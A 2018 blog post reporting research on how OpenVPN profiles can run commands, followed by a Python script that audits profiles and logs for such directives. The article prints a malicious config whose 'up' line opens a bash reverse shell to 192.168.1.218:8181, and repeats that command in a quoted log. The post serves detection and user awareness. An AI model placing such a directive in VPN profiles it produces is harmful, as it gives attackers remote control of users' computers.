Category: IT|Jun 23, 2018 | Author: Admin

Downloading 3rd Party OpenVPN Configs May Be Dangerous. Here’s Why.


Call me a cynic, but one thing I have learned from using the Internet is to double-check, if not triple-check, everything you download. So many downloads carry malware, adware, or scripts that perform malicious activities on your computer that thoroughly checking a download before it is used has to be a requirement.


This point is shown in research posted by Tenable reverse engineer Jacob Baines, where he shows how a normally harmless VPN configuration file can be used to open a backdoor on a computer that uses it. 

OpenVPN configs can execute commands
In his article, Baines explains how a simple OpenVPN configuration file can be used to execute commands on a computer after a VPN connection is made. This could also allow attackers to distribute OpenVPN configuration files that automatically execute commands to open a backdoor through a reverse shell or perform other unwanted behavior on the computer.

OpenVPN is a popular open-source VPN program that allows you to create a secure and encrypted network connection between your computer or device and another network. Due to its popularity, it has been ported to work on a variety of devices, including routers that run DD-WRT. To facilitate this, VPN providers create OpenVPN profiles that can be downloaded and installed in order to easily configure a VPN connection.

According to Baines, all a bad actor would need to do is add a few lines to a harmless OpenVPN configuration file (.ovpn) to make it malicious. In Baines' example, an OpenVPN configuration file is simply a text file with some directives in it:

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun

If an actor wanted to cause the OpenVPN configuration file to execute a command, they would add the "script-security 2" line, which allows user-defined scripts to be executed, and an "up" entry, which contains the command that is executed after a connection has been made. As an example, he changed the above configuration file so that it executes a command as shown below.

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&'"

When this configuration file is used and after a connection has been established, OpenVPN will execute the above command to open a reverse shell to the computer at 192.168.1.218. This would allow the attacker at that IP address to execute commands on the remote computer that ran the OpenVPN configuration file.

Baines even goes on to show how the above method could be ported to attack Windows users by using a PowerShell script instead.

While this shows you should be careful about downloading OpenVPN configs from third parties, Baines told BleepingComputer that he has not found any malicious configs currently in the wild.

How do you detect malicious OpenVPN configuration files?
Now that you know that OpenVPN configuration could be used against you, you may be wondering how to check if any that you use are malicious.

In his article, Baines states that you can find clues in a VPN connection log as shown below.

Thu Jun 7 12:28:23 2018 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Thu Jun 7 12:28:23 2018 /bin/bash -c /bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1& tun0 1500 1500 10.200.0.2 10.200.0.1 init

If you see the above lines in your log, it means the "script-security 2" setting was used, which allows user-defined scripts to be executed. As that line is required to run scripts, it would follow that something is being executed by the configuration file. You should be able to spot the command being executed as shown by the second line in the log above.

As OpenVPN configuration files are simply text files, you can also check whether an OpenVPN configuration is malicious by opening the file in Notepad or another text editor. This lets you see the entire configuration file and spot whether any commands are being executed.

Unfortunately, OpenVPN has other configuration directives that can execute commands as well, and Baines recommends that users use the Viscosity OpenVPN client instead, which can filter out these types of commands.

"Unfortunately, the up command is not the only command that can be used in this way," Baines told BleepingComputer. "Up, down, client-connect, learn-address, auth-user-pass-verify, and learn-address all execute configuration specified commands (although some of these are server specific). A layperson might try to review and understand the configuration file. However, I think it's safer to use a client like viscosity that simply filters out this behavior."
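The checks this section describes, as an added example in Python (not from the article, from Baines' research, or from the OpenVPN project): it reads a profile as plain text the way the article suggests, reports the script-security level, flags every directive that would run an external command (the directives named above plus other script hooks from the OpenVPN manual, such as route-up, tls-verify and plugin), and picks out the log warning quoted in the excerpt above. The sample profile and log lines are constructed; /etc/openvpn/update-resolv-conf is a common legitimate "up" script, included to show that a finding is an item to review rather than a verdict.

```python
import re
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple

# Directives that make OpenVPN run an external program, script or plugin.
# up, down, client-connect, learn-address and auth-user-pass-verify are the
# ones the article names; the rest are further script hooks from the OpenVPN
# manual. The value says where the hook fires, so a server-only hook in a
# profile handed to a client stands out during review.
COMMAND_DIRECTIVES = {
    "up": "client or server",
    "down": "client or server",
    "route-up": "client or server",
    "route-pre-down": "client or server",
    "tls-verify": "client or server",
    "ipchange": "client",
    "client-connect": "server",
    "client-disconnect": "server",
    "learn-address": "server",
    "auth-user-pass-verify": "server",
    "plugin": "client or server (loads a shared library)",
}

# Warning OpenVPN logs when script-security permits user scripts; it is the
# first line of the article's log excerpt.
SCRIPT_SECURITY_NOTE = ("NOTE: the current --script-security setting may allow "
                        "this configuration to call user-defined scripts")

@dataclass
class Finding:
    line_no: int    # 1-based line in the profile
    directive: str
    argument: str   # the command OpenVPN would run, exactly as written
    scope: str

def iter_directives(text: str) -> Iterator[Tuple[int, str, str]]:
    """Yield (line_no, directive, argument) for each active directive, skipping
    blank lines, '#'/';' comments and inline file bodies such as <ca>...</ca>."""
    inline_block = None
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if inline_block is not None:            # inside <tag> ... </tag>
            if line == f"</{inline_block}>":
                inline_block = None
            continue
        if not line or line[0] in "#;":
            continue
        opener = re.fullmatch(r"<([a-z0-9-]+)>", line)
        if opener:
            inline_block = opener.group(1)
            continue
        parts = line.split(None, 1)
        directive = parts[0].lstrip("-")        # tolerate a pasted "--directive"
        yield line_no, directive, parts[1] if len(parts) > 1 else ""

def script_security_level(text: str) -> Optional[int]:
    """Configured script-security level (0 no external programs, 1 built-in
    executables only, 2 user-defined scripts, 3 also passwords via environment)
    or None if unset. The last occurrence wins, as in OpenVPN."""
    level = None
    for _, directive, argument in iter_directives(text):
        if directive == "script-security":
            first = argument.split()[:1]
            level = int(first[0]) if first and first[0].isdigit() else None
    return level

def audit_config(text: str) -> List[Finding]:
    """Every directive in the profile that would run an external command."""
    return [Finding(n, d, a, COMMAND_DIRECTIVES[d])
            for n, d, a in iter_directives(text) if d in COMMAND_DIRECTIVES]

def scan_log(lines) -> List[str]:
    """Log lines showing that user-defined scripts were permitted."""
    return [line for line in lines if SCRIPT_SECURITY_NOTE in line]

# Constructed sample profile for this example; not a real provider's file.
SAMPLE_PROFILE = """\
client
dev tun
remote vpn.example.invalid 1194
<ca>
PLACEHOLDER-NOT-A-REAL-CERTIFICATE
</ca>
script-security 2
up /etc/openvpn/update-resolv-conf
down /etc/openvpn/update-resolv-conf
; client-connect /tmp/disabled.sh
"""

# Constructed log lines in OpenVPN's format, mirroring the article's excerpt.
SAMPLE_LOG = [
    "Thu Jun  7 12:28:23 2018 " + SCRIPT_SECURITY_NOTE,
    "Thu Jun  7 12:28:23 2018 /etc/openvpn/update-resolv-conf tun0 1500 1500 "
    "10.200.0.2 10.200.0.1 init",
    "Thu Jun  7 12:28:24 2018 Initialization Sequence Completed",
]

if __name__ == "__main__":
    print("script-security level:", script_security_level(SAMPLE_PROFILE))
    for f in audit_config(SAMPLE_PROFILE):
        print(f"line {f.line_no}: {f.directive} ({f.scope}) runs {f.argument}")
    for entry in scan_log(SAMPLE_LOG):
        print("log:", entry)
```

Run against a downloaded profile, every hit is a line to read before the profile is ever loaded; a server-only hook such as client-connect inside a file meant for a client, or any "up" argument that invokes a shell rather than a known helper script, deserves particular attention. The commented-out client-connect line in the sample is deliberately not reported, since OpenVPN ignores it too.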
